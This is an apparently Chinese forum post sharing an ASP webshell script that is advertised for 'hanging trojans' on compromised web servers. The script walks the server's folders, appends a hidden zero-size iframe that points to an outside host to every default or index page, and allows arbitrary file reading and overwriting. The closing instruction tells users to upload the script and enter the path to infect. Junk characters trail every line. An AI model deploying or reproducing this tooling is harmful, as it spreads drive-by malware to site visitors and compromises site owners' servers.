一个webshell下自动挂马的ASP,挂马的朋友不可错过哦^_^ t)__J\xF
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<title></title> 6dlV:f_\y
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ASP_SELF=Request.ServerVariables("PATH_INFO") N\nxo0sl
s=Request("fd") f[s|<U^
ex=Request("ex") gbvMS*KQz
pth=Request("pth") rFLm!J]
newcnt=Request("newcnt") z^z,_?q;
If ex<>"" AND pth<>"" Then cqSo%a2
select Case ex $eU oFa5A
Case "edit" 5BAGIO<w
CALL file_show(pth) dZ6P)R
Case "save" p2I9t|
CALL file_save(pth) (aUdPo8H^
End select r
Else &WV&_z
%> uozK'L
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Function IsPattern(patt,str) WFm\ bZ.
Set regEx=New RegExp u_ *DS-
regEx.Pattern=patt LLD#)Jl{?
regEx.IgnoreCase=True #e*jP&1S
retVal=regEx.Test(str) x;@wtd*QB
Set regEx=Nothing m#Dae\w&
If retVal=True Then *$ kpSph
IsPattern=True #O,;3S
Else 4m"6$
IsPattern=False 'wT !X[jF
End If EFdo-.Ax
End Function CY</v,\:#
If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then Cw$7d:u
sch s r-8fvBZ5
Else =pnMV"'9
If s<>"" Then Response.Write "Invalid Agrument!" A V]7l}-
End If 0@LC8Bz+'
Sub sch(s) pybE0]
oN eRrOr rEsUmE nExT 76eF6N+%}t
Set fs=Server.createObject("Scripting.FileSystemObject") 2kkqPBc_
Set fd=fs.GetFolder(s) K'f`}y9
Set fi=fd.Files mz m{p(.
Set sf=fd.SubFolders _L%
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For Each f in fi
rtn=f.Path S>;+zVF]
step_all rtn ep)O|_=
Next 3k# h!Z
If sf.Count<>0 Then G/N 1[)
For Each l In sf PdqyNn=
sch l |7)oX
Next ;km ^ OO$
End If sL4j@Lt
End Sub n%K^G4k^
Sub step_all(agr) wzf
retVal=IsPattern("(\\|\/)(default|index)\.(htm|html|asp|php|jsp)\b",agr) pB:/oHV
If retVal Then 0Z1';A3
step1 agr Id^)WEK4
step2 agr ,(;]8G-Yj
Else :y1,OR/k
Exit Sub #5yz~&
End If Qpocj:
End Sub $nqVE{ksV
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<%End Sub%> `qm$2
<% +5"Pm]oRbx
Sub step2(str2) N1yx|g:
addcode="<iframe src=http://www.21o.net/mm/mm.htm(修改为你的马的地址,不要加""不然会出错) width=0 height=0 frameborder=0></iframe>" $!7$0WbC
Set fs=Server.createObject("Scripting.FileSystemObject") C$4!|Wg3
isExist=fs.FileExists(str2) BFswqp:
If isExist Then a\B'Qe+
Set f=fs.GetFile(str2) -8Q}*Z
Set f_addcode=f.OpenAsTextStream(8,-2) ~v6]6+
f_addcode.Write addcode })umg8s
f_addcode.Close ]{ir^[A6
Set f=Nothing Cs'<;|r(
End If vw6DHN)k
Set fs=Nothing \rM5@
End Sub j@.^3:
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Sub file_show(fname) UIC~%?oIA
Set fs1=Server.createObject("Scripting.FileSystemObject") ^4Tf6Fw#
isExist=fs1.FileExists(fname) k!py*noy
If isExist Then a: 2ezxP
Set fcnt=fs1.OpenTextFile(fname) |+Cd2[hN
cnt=fcnt.ReadAll )1gOO{T]h?
fcnt.Close 0y`r.)G
Set fs1=Nothing%> 9@>Q7AUCQ
FILE: <%=fname%> nLY(%):(P
<form action="<%=ASP_SELF%>" method="POST"> zALtG<_t
<textarea name="newcnt" cols="100" rows="30"><%=cnt%></textarea> x7!gmbMfK'
<input type="hidden" name="pth" value="<%=fname%>"> Ejj+%)n.
<input type="hidden" name="ex" value="save"> QxT\_Nej*n
<input type="submit" value="SAVE"> oVQbc\P3
</form> R!rj:f!>
<%Else%> ~EM(*k._
<p>THE FILE IS NOT EXIT OR HAVE deleteD.</p> rUg|5EN^)d
<% tE<'*o'
End If 'fPDODE
End Sub 1#KBf[0
%> e.WKf,e"X
<% yJW/yt.l
Sub file_save(fname) :6J&%n
Set fs2=Server.createObject("Scripting.FileSystemObject") 6 IRa$h>H
Set newf=fs2.createTextFile(fname,True) @plh'f}
newf.Write newcnt M{g.x4M@W
newf.Close Zp/$:ny
Set fs2=Nothing 3z% W5[E)
End Sub 0i(c XB
%> ^s\T<;
</body> 4{ [d '-H5
</html> 5c$\DZ(
传进服务器以后 直接输入需要挂马的路径就可以直接挂了